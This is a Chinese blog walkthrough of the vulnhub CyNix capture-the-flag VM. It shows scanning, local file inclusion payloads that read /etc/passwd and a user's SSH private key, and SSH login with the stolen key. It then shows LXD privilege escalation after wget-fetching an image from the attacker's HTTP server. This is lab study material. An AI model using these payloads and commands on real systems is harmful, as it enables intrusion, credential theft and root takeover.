vulnhub之CyNix的实践

admin 2021年7月25日02:41:58评论103 views字数 1333阅读4分26秒阅读模式

本周末实践的是vulnhub的CyNix镜像,这个比较难,只能跟着人家的writeup走,

下载地址,https://download.vulnhub.com/cynix/CyNix.ova,

用workstation导入出错,改用virtualbox导入成功,

老规矩,先做地址扫描,

sudo netdiscover -r 192.168.56.0/24,

vulnhub之CyNix的实践

按照经验,192.168.56.102是靶机,

接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.56.102,

vulnhub之CyNix的实践

有http服务,用dirbuster做目录爆破,

vulnhub之CyNix的实践

浏览器访问http://192.168.56.102/lavalamp,在页面源码里找到个contactform.js,又在contactform.js源码里找到个canyoubypassme.php,

vulnhub之CyNix的实践

浏览器访问http://192.168.56.102/lavalamp/canyoubypassme.php,

在页面源码里找到opacity: 0.0,F12切到inspect模式,改成opacity: 1.0,

vulnhub之CyNix的实践


这就能看到输入框了,随便输入个数字1,用Burp Suite看到存在本地文件包含的漏洞点,

vulnhub之CyNix的实践

注入../../../etc/passwd,查看到passwd文件内容,

vulnhub之CyNix的实践

注意到ford账户,猜测能够ssh公钥认证登录,

注入../../../home/ford/.ssh/id_rsa,拿到密钥文件内容,

新建文件放到kali攻击机上,注意给文件权限,chmod 700 key,

注意到之前端口扫描出来的ssh端口是6688,
指定密钥文件和端口登录,ssh -i key [email protected] -p 6688,

不是root,需要提权,这里用的是lxc的提权方法,

kali攻击机上下载制作lxc提权镜像,

git clone  https://github.com/saghul/lxd-alpine-builder.git,
cd lxd-alpine-builder,

切到root,./build-alpine,

kali攻击机上开启http下载服务,python -m SimpleHTTPServer,

靶机上下载lxc镜像,wget http://192.168.56.105:8000/alpine-v3.14-x86_64-20210724_2139.tar.gz,

靶机上导入lxc镜像并查看,

lxc image import ./alpine-v3.14-x86_64-20210724_2139.tar.gz --alias myimage,
lxc image list,

靶机上创建lxc实例并配置后启动,

lxc init myimage ignite -c security.privileged=true,
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true,
lxc start ignite,

靶机上进入lxc实例并查看,lxc exec ignite /bin/sh,id,是root,没问题,


vulnhub之CyNix的实践


本文始发于微信公众号(云计算和网络安全技术实践):vulnhub之CyNix的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日02:41:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之CyNix的实践http://cn-sec.com/archives/434956.html

发表评论

匿名网友 填写信息